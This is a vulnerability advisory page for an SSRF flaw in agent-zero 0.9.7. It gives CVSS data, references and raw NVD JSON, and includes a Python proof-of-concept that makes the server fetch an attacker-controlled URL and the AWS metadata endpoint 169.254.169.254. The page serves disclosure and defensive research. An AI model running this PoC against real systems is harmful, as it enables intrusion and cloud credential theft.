CVE-2026-4308

Description

A weakness has been identified in frdel/agent0ai agent-zero 0.9.7. This affects the function handle_pdf_document of the file python/helpers/document_query.py. This manipulation causes server-side request forgery. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

frdel/agent0ai agent-zero 0.9.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-4308 SSRF PoC for frdel/agent0 agent-zero
This PoC demonstrates how to trigger the SSRF via handle_pdf_document function
"""

import requests
import json

TARGET_URL = "http://target-server:8000"
ATTACKER_SERVER = "http://attacker-controlled-server:8888"

def exploit_ssrf():
    """
    Exploit the SSRF vulnerability in handle_pdf_document
    The vulnerability allows attacker to make server request to arbitrary URLs
    """
    
    # Malicious PDF with embedded URL that triggers SSRF
    # The handle_pdf_document function will fetch this URL
    malicious_url = f"{ATTACKER_SERVER}/malicious-endpoint"
    
    # Construct the exploit payload
    payload = {
        "action": "handle_pdf_document",
        "document_path": malicious_url,
        "file_url": malicious_url,
        "pdf_url": malicious_url
    }
    
    # Target the vulnerable endpoint
    exploit_endpoint = f"{TARGET_URL}/api/document_query"
    
    try:
        response = requests.post(
            exploit_endpoint,
            json=payload,
            timeout=10,
            verify=False
        )
        print(f"Response Status: {response.status_code}")
        print(f"Response Body: {response.text}")
        
        # Check if our server received the request (confirming SSRF)
        print(f"\n[+] Check attacker server logs for incoming request from target")
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

def test_internal_access():
    """
    Test accessing internal metadata service (AWS EC2 example)
    """
    
    # Target internal metadata endpoint
    metadata_url = "http://169.254.169.254/latest/meta-data/"
    
    payload = {
        "action": "handle_pdf_document",
        "document_path": metadata_url,
        "file_url": metadata_url
    }
    
    exploit_endpoint = f"{TARGET_URL}/api/document_query"
    
    try:
        response = requests.post(
            exploit_endpoint,
            json=payload,
            timeout=10
        )
        print(f"Metadata Response: {response.text}")
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("CVE-2026-4308 SSRF Exploit PoC")
    print("=" * 50)
    exploit_ssrf()
    print("\n" + "=" * 50)
    print("Testing internal service access...")
    test_internal_access()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4308
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4308
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4308/
[4] VulDB https://vuldb.com/cve/CVE-2026-4308
[5] https://gist.github.com/YLChen-007/c99c44aa019266a72636757308d43989
[6] https://gist.github.com/YLChen-007/c99c44aa019266a72636757308d43989#poc
[7] https://vuldb.com/?ctiid.351338
[8] https://vuldb.com/?id.351338
[9] https://vuldb.com/?submit.773950

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4308", "sourceIdentifier": "[email protected]", "published": "2026-03-17T04:16:24.207", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in frdel/agent0ai agent-zero 0.9.7. This affects the function handle_pdf_document of the file python/helpers/document_query.py. This manipulation causes server-side request forgery. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en frdel/agent0ai agent-zero 0.9.7. Esto afecta a la función handle_pdf_document del archivo python/helpers/document_query.py. Esta manipulación causa falsificación de petición del lado del servidor. El ataque es posible de ser llevado a cabo remotamente. El exploit ha sido puesto a disposición del público y podría ser usado para ataques. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://gist.github.com/YLChen-007/c99c44aa019266a72636757308d43989", "source": "[email protected]"}, {"url": "https://gist.github.com/YLChen-007/c99c44aa019266a72636757308d43989#poc", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351338", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351338", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.773950", "source": "[email protected]"}]}}